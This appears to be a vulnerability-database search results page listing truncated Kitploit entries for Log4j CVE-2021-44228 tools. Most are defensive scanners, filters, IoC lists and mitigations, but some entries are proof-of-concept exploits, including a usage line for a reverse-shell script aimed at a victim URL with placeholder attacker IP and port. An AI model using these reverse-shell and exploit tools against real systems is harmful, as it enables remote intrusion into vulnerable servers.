Lucene search
+L

903 matches found

Kitploit
Kitploit
added 2026/08/31 3:53 p.m.11 views

cloudrasp-log4j2

CloudArmor · Runtime Application Self-Protection Module - Log4j2 Version 简体中文 This project is a local version from CloudArmor specifically built for defending Log4j2 CVE-2021-44228 . No network connection is required to run this project. Please DO TESTING before deploying it to production...

10CVSS7.1AI score0.99999EPSS
SaveExploits365References1
Kitploit
Kitploit
added 2026/08/31 2:37 p.m.2 views

Log4j-CVE-2021-44228

This python scanner will detect the log4j vulnerability in java instances and ping back the response...

10CVSS7AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 1:38 p.m.2 views

jndi-ldap-test-server

jndi-ldap-test-server This is a minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228. How to test vulnerability to CVE-2021-44228 1. Download the test server binary for your platform you can find all binaries under Release...

10CVSS7AI score0.99999EPSS
SaveExploits365References2
Kitploit
Kitploit
added 2026/08/31 1:28 p.m.2 views

Log4Shell-PoC

root@kitploit: ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗ ██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║ ██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║ ██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║ ███████╗╚██████╔╝╚██████╔╝ ██║███████║██║...

10CVSS7AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 1:21 p.m.6 views

log4shell_sentinel

Log4Shell Sentinel - A Smart CVE-2021-44228 Scanner Introduction While there have some excellent tools released to help organizations scan their environments for applications vulnerable to the critical Log4J / CVE-2021-44228 vulnerability, I felt that: none of the tools I ran into were made for...

10CVSS7.4AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 1:19 p.m.5 views

fail2ban-log4j

fail2ban-log4j fail2ban filter that catches attacks against log4j CVE-2021-44228 Installation Copy this file to your fail2ban filter.d directory, which is usually something like /etc/fail2ban/filter.d or similar. Add an apache-jndi section to your jail.local or jail.conf: root@kitploit: apache-jn...

10CVSS6.9AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 1:14 p.m.2 views

log4j-cve-2021-44228

log4j-cve-2021-44228...

10CVSS7.5AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 12:56 p.m.3 views

log4j-shell-csw

Log4j Simple Exploit A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability. Log4j, which is used to log security and performance information, impacts upwards of 3 billion devices that use Java across a variety of consumer and enterprise services, websites and applications, as well as medica...

10CVSS6.9AI score0.99999EPSS
SaveExploits365References1
Kitploit
Kitploit
added 2026/08/31 12:52 p.m.3 views

CVE-2021-44228

Log4Shell POC CVE-2021-44228 The scope of this repository is to provide all the components needed to exploit CVE-2021-44228, nicknamed Log4Shell, and to show how to exploit it. The ingredients needed to exploit this vulnerability are the following: 1. An LDAP Server that will redirect the...

10CVSS6.9AI score0.99999EPSS
SaveExploits365References2
Kitploit
Kitploit
added 2026/08/31 12:52 p.m.4 views

CVE-2021-44228_IoCs

CVE-2021-44228IoCs Public IoCs for log4j framework vulnerability CVE-2021-44228 log4shell based on multiple public sources...

10CVSS7.5AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 12:46 p.m.4 views

nginx-mitigate-log4shell

nginx-mitigate-log4shell Mitigate log4shell CVE-2021-44228 and CVE-2021-45046 vulnerability attacks using Nginx LUA script Requires the Nginx lua module https://www.nginx.com/resources/wiki/modules/lua/ to be enabled. Use include /path/to/mitigate-log4shell.conf; in the server ... context. Can be...

10CVSS7AI score0.99999EPSS
SaveExploits367
Kitploit
Kitploit
added 2026/08/31 12:42 p.m.6 views

CVE-2021-44228

CVE-2021-44228 Mass recognition tool for CVE-2021-44228 need to fix Crypto library to work with Python3.9 sudo vim /usr/local/lib/python3.9/dist-packages/Crypto/Random/UserFriendlyRNG.py replace line 77 : t = time.clock with : t = time.perfcounter how to use : sudo python3 192.168.0.0/8 mylog.txt...

10CVSS7AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 12:42 p.m.3 views

log4j-Scan-Burpsuite

log4j-Scan-Burpsuite Burpsuite detection plugin for Log4j vulnerability CVE-2021-44228 Includes ON/OFF switch, Filter, Send Features: Automatically replace request headers Automatically replace POST request application/json parameters Automatically replace POST request application/x-www-urlencode...

10CVSS7AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 12:38 p.m.4 views

Log4j2-CVE-2021-44228-revshell

Log4j2-CVE-2021-44228-revshell Usage root@kitploit: For reverse shell: $ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l AttackerIP -p AttackerPort -hp HTTPServerPort For check exploitable: $ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l...

10CVSS7AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 12:21 p.m.3 views

Log4JShell-Bytecode-Detector

🔍 Log4JShell Bytecode Detector Log4jShell Bytecode Detector is an open source tool that helps identify if a jar file is affected by the critical CVE-2021-44228. The tool scans the jar file and compares the classses against a set of vulnerable hashes for classes within the jar file. The hashes hav...

10CVSS6.9AI score0.99999EPSS
SaveExploits365References2
Kitploit
Kitploit
added 2026/08/31 12:03 p.m.5 views

log4j-CVE-2021-44228-Public-IoCs

log4j log4shell CVE-2021-44228 Public IoCs list Public IoCs about log4j CVE-2021-44228 log4shell based on Twitter and others social networks pull requests accepted, I remove duplicates automatically IPs https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs/raw/main/ips.txt Callbacks domains...

10CVSS7AI score0.99999EPSS
SaveExploits365References18
Kitploit
Kitploit
added 2026/08/31 11:57 a.m.3 views

log4j-CVE-2021-44228-workaround

log4j-CVE-2021-44228-workaround A. Solution Description This project provides a general purpose workaround for the log4j CVE-2021-44228 vulnerability, which can be used in case you do not have the alternative in short term to re-build your respective project or to patch the log4j-core jars. The...

10CVSS7.5AI score0.99999EPSS
SaveExploits365
Kitploit
Kitploit
added 2026/08/31 11:52 a.m.2 views

log4fix

log4fix This tool is to detect and fix the log4j log4shell vulnerability CVE-2021-44228 by looking and removing the JndiLookup class from .jar/.war/.ear files with zero dependencies for free. This tool has been tested on: - Linux 32bit and 64 bit - Windows 32 bit and 64 bit - OpenBSD 64 bit This...

10CVSS7AI score0.99999EPSS
SaveExploits365References1
Kitploit
Kitploit
added 2026/08/31 11:21 a.m.2 views

Log4j-JNDIServer

Log4j-JNDIServer Этот проект поможет протестировать уязвимости Log4j CVE-2021-44228/CVE-2021-45046. Установка и сборка Загрузите проект в Intellij Idea Выберите JDK в «Projects Settings» CTRL + ALT + SHIFT + S В «Project Settings» создайте артефакт: «Artifacts» → «Create JAR from Modules» → в «JA...

9CVSS6.9AI score0.99977EPSS
SaveExploits40
Kitploit
Kitploit
added 2026/08/31 10:29 a.m.3 views

log4j_checker

Log4jchecker.py CVE-2021-44228 Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a very critical vulnerability found in Log4j2 Java logging library. It doesn't rely on external DNS log servers to verify and validate the vulnerable...

10CVSS6.9AI score0.99999EPSS
SaveExploits365
Rows per page
Query Builder